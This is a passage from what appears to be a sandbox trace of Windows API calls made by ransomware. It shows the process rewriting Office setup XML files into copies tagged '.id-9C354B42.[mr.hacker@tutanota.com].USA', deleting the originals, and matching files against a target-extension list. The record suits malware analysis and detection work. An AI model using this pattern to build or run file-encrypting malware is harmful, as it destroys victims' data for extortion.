files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 0x20 [0040.802] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.802] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.802] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.802] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.803] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0040.804] GetLastError () returned 0x0 [0040.804] ReadFile (in: hFile=0x19c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x412b, lpOverlapped=0x0) returned 1 [0040.806] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x4130, lpOverlapped=0x0) returned 1 [0040.807] ReadFile (in: hFile=0x19c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0040.807] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.807] SetEndOfFile (hFile=0x1c8) returned 1 [0040.808] CloseHandle (hObject=0x1c8) returned 1 [0040.808] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.808] SetEndOfFile (hFile=0x19c) returned 1 [0040.809] CloseHandle (hObject=0x19c) returned 1 [0040.810] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.810] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 1 [0040.810] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.810] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.810] lstrlenW (lpString=".doc") returned 4 [0040.810] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.810] lstrlenW (lpString=".docx") returned 5 [0040.810] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.810] lstrlenW (lpString=".pdf") returned 4 [0040.810] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.810] lstrlenW (lpString=".xls") returned 4 [0040.810] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.810] lstrlenW (lpString=".xlsx") returned 5 [0040.810] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.810] lstrlenW (lpString=".ppt") returned 4 [0040.810] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.810] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.810] lstrlenW (lpString=".zip") returned 4 [0040.810] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.810] lstrlenW (lpString=".rar") returned 4 [0040.810] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString=".bz2") returned 4 [0040.811] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString=".7z") returned 3 [0040.811] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.811] lstrlenW (lpString=".dbf") returned 4 [0040.811] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.811] lstrlenW (lpString=".1cd") returned 4 [0040.811] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.811] lstrlenW (lpString=".jpg") returned 4 [0040.811] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.811] lstrlenW (lpString=".doc") returned 4 [0040.811] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString=".docx") returned 5 [0040.811] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.811] lstrlenW (lpString=".pdf") returned 4 [0040.811] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString=".xls") returned 4 [0040.811] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString=".xlsx") returned 5 [0040.811] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.811] lstrlenW (lpString=".ppt") returned 4 [0040.811] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.811] lstrlenW (lpString=".zip") returned 4 [0040.811] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.811] lstrlenW (lpString=".rar") returned 4 [0040.811] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString=".bz2") returned 4 [0040.811] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.811] lstrlenW (lpString=".7z") returned 3 [0040.812] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.812] lstrlenW (lpString=".dbf") returned 4 [0040.812] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.812] lstrlenW (lpString=".1cd") returned 4 [0040.812] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0040.812] lstrlenW (lpString=".jpg") returned 4 [0040.812] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.812] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.812] lstrlenW (lpString="ProjectMUI.XML") returned 14 [0040.812] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.812] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=1452) returned 1 [0040.812] CloseHandle (hObject=0x19c) returned 1 [0040.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 0x20 [0040.813] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.813] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.813] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0040.815] GetLastError () returned 0x0 [0040.815] ReadFile (in: hFile=0x19c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x5ac, lpOverlapped=0x0) returned 1 [0040.816] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0040.817] ReadFile (in: hFile=0x19c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0040.817] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.817] SetEndOfFile (hFile=0x1c8) returned 1 [0040.817] CloseHandle (hObject=0x1c8) returned 1 [0040.818] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.818] SetEndOfFile (hFile=0x19c) returned 1 [0040.818] CloseHandle (hObject=0x19c) returned 1 [0040.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.819] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 1 [0040.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.819] lstrlenW (lpString=".doc") returned 4 [0040.819] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.819] lstrlenW (lpString=".docx") returned 5 [0040.819] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.819] lstrlenW (lpString=".pdf") returned 4 [0040.819] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.819] lstrlenW (lpString=".xls") returned 4 [0040.819] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.819] lstrlenW (lpString=".xlsx") returned 5 [0040.819] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.819] lstrlenW (lpString=".ppt") returned 4 [0040.819] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.819] lstrlenW (lpString=".zip") returned 4 [0040.819] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.819] lstrlenW (lpString=".rar") returned 4 [0040.819] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.819] lstrlenW (lpString=".bz2") returned 4 [0040.820] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.820] lstrlenW (lpString=".7z") returned 3 [0040.820] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.820] lstrlenW (lpString=".dbf") returned 4 [0040.820] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.820] lstrlenW (lpString=".1cd") returned 4 [0040.820] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.820] lstrlenW (lpString=".jpg") returned 4 [0040.820] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.820] lstrlenW (lpString=".doc") returned 4 [0040.820] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.820] lstrlenW (lpString=".docx") returned 5 [0040.820] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.820] lstrlenW (lpString=".pdf") returned 4 [0040.820] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.820] lstrlenW (lpString=".xls") returned 4 [0040.820] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.820] lstrlenW (lpString=".xlsx") returned 5 [0040.820] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.820] lstrlenW (lpString=".ppt") returned 4 [0040.820] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.820] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.820] lstrlenW (lpString=".zip") returned 4 [0040.820] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.820] lstrlenW (lpString=".rar") returned 4 [0040.820] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.820] lstrlenW (lpString=".bz2") returned 4 [0040.820] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.820] lstrlenW (lpString=".7z") returned 3 [0040.820] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.821] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.821] lstrlenW (lpString=".dbf") returned 4 [0040.821] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.821] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.821] lstrlenW (lpString=".1cd") returned 4 [0040.821] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.821] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.821] lstrlenW (lpString=".jpg") returned 4 [0040.821] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.821] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.821] lstrlenW (lpString="SETUP.XML") returned 9 [0040.821] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.821] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=1872) returned 1 [0040.821] CloseHandle (hObject=0x19c) returned 1 [0040.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 0x20 [0040.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.822] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.822] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.822] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0040.822] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0040.822] GetLastError () returned 0x0 [0040.822] ReadFile (in: hFile=0x19c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x750, lpOverlapped=0x0) returned 1 [0041.076] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x760, lpOverlapped=0x0) returned 1 [0041.077] ReadFile (in: hFile=0x19c, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0041.077] WriteFile (in: hFile=0x1c8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.077] SetEndOfFile (hFile=0x1c8) returned 1 [0041.077] CloseHandle (hObject=0x1c8) returned 1 [0041.078] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.078] SetEndOfFile (hFile=0x19c) returned 1 [0041.079] CloseHandle (hObject=0x19c) returned 1 [0041.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.079] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml")) returned 1 [0041.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.079] lstrlenW (lpString=".doc") returned 4 [0041.079] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.079] lstrlenW (lpString=".docx") returned 5 [0041.079] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.079] lstrlenW (lpString=".pdf") returned 4 [0041.079] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.079] lstrlenW (lpString=".xls") returned 4 [0041.079] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.079] lstrlenW (lpString=".xlsx") returned 5 [0041.079] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.079] lstrlenW (lpString=".ppt") returned 4 [0041.079] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.079] lstrlenW (lpString=".zip") returned 4 [0041.080] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.080] lstrlenW (lpString=".rar") returned 4 [0041.080] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.080] lstrlenW (lpString=".bz2") returned 4 [0041.080] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.080] lstrlenW (lpString=".7z") returned 3 [0041.080] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.080] lstrlenW (lpString=".dbf") returned 4 [0041.080] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.080] lstrlenW (lpString=".1cd") returned 4 [0041.080] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.080] lstrlenW (lpString=".jpg") returned 4 [0041.080] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.080] lstrlenW (lpString=".doc") returned 4 [0041.080] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.080] lstrlenW (lpString=".docx") returned 5 [0041.080] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.080] lstrlenW (lpString=".pdf") returned 4 [0041.080] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.080] lstrlenW (lpString=".xls") returned 4 [0041.080] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.080] lstrlenW (lpString=".xlsx") returned 5 [0041.080] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.080] lstrlenW (lpString=".ppt") returned 4 [0041.080] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.080] lstrlenW (lpString=".zip") returned 4 [0041.080] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.080] lstrlenW (lpString=".rar") returned 4 [0041.080] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.080] lstrlenW (lpString=".bz2") returned 4 [0041.081] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.081] lstrlenW (lpString=".7z") returned 3 [0041.081] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.081] lstrlenW (lpString=".dbf") returned 4 [0041.081] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.081] lstrlenW (lpString=".1cd") returned 4 [0041.081] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.081] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 